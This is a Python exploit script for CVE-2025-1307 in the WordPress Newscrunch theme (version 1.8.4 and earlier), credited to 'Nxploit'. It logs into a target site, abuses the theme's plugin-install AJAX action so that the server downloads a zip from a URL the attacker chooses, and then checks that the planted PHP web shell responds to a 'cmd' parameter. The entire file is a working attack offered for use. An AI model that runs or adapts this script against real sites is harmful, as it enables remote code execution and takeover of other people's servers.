import requests import urllib3 import argparse import time import re import zipfile import io from packaging import version urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) BANNER = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@!! @@@ @@! @@@@ @@! !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! !@! @!@ !@! @!@!@ !@! !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@ @!@!!@ @!@ @! !@! @!! !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !@! !!@!@! !@!!! !!! !!! :!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!: !!:! !!! !!: :!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: ::: :: :::: ::::::: :: :: :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : : : : : : : : : Exploit by | Nxploit , Khaled_alenazi """ def get_filename_from_zip(payload_url): try: response = requests.get(payload_url, verify=False, timeout=10) zip_data = io.BytesIO(response.content) with zipfile.ZipFile(zip_data, 'r') as zip_file: file_list = zip_file.namelist() php_files = [f for f in file_list if f.endswith(".php")] if php_files: return php_files[0] # Return the first PHP file found else: return None except Exception as e: print(f"[-] Error extracting filename from ZIP: {e}") return None def check_version(url): try: url_version = f"{url}/wp-content/themes/newscrunch/readme.txt" response = requests.get(url_version, verify=False, timeout=10) if response.status_code == 200: match = re.search(r"Stable tag:\s*([\d.]+)", response.text) if match: theme_version = match.group(1) print(f"[+] Newscrunch theme version detected: {theme_version}") if version.parse(theme_version) <= version.parse("1.8.4"): print("[+] Exploitation is possible, proceeding...") return True else: print("[-] Target version is not vulnerable. Exiting.") return False else: print("[-] Could not determine theme version. Proceeding anyway...") return True else: print("[-] Failed to fetch theme version. Proceeding anyway...") return True except requests.RequestException as e: print(f"[-] Error checking version: {e}") return False def login(url, username, password): try: session = requests.Session() login_url = f"{url}/wp-login.php" login_data = {'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log+In'} print("[*] Logging in...") response = session.post(login_url, verify=False, data=login_data, timeout=10) time.sleep(2) if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): print("[+] Logged in successfully.") return session else: print("[-] Failed to log in. Check credentials.") return None except requests.RequestException as e: print(f"[-] Error logging in: {e}") return None def upload_and_extract(session, url, payload_url): try: exploit_url = f"{url}/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin" exploit_data = {'plugin_url': payload_url} print("[*] Uploading and extracting payload...") response = session.post(exploit_url, verify=False, data=exploit_data, timeout=15) time.sleep(3) if "success" in response.text.lower(): print("[+] Exploit executed successfully. Malicious file uploaded.") return True else: print("[-] Exploit failed. Server response:") print(response.text) return False except requests.RequestException as e: print(f"[-] Error during upload and extraction: {e}") return False def exploit(url, username, password, payload_url): if not check_version(url): return shell_file = get_filename_from_zip(payload_url) if not shell_file: print("[-] Could not determine the shell filename. Exiting.") return session = login(url, username, password) if not session: return if upload_and_extract(session, url, payload_url): shell_url = f"{url}/wp-content/plugins/{shell_file}" print(f"[*] Checking if shell is accessible: {shell_url}") time.sleep(2) try: shell_response = session.get(shell_url, verify=False, timeout=10) if shell_response.status_code == 200: print(f"[+] Shell successfully uploaded and accessible: {shell_url}?cmd=ls") else: print("[-] Shell upload failed or blocked. Check manually.") except requests.RequestException as e: print(f"[-] Error checking shell accessibility: {e}") if __name__ == "__main__": print(BANNER) parser = argparse.ArgumentParser(description="Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi") parser.add_argument('-u', '--url', required=True, help="Target WordPress URL (e.g., https://example.com)") parser.add_argument('-un', '--username', required=True, help="WordPress username") parser.add_argument('-p', '--password', required=True, help="WordPress password") parser.add_argument('-pl', '--payload_url', required=True, help="Malicious file URL to upload") args = parser.parse_args() exploit(args.url, args.username, args.password, args.payload_url)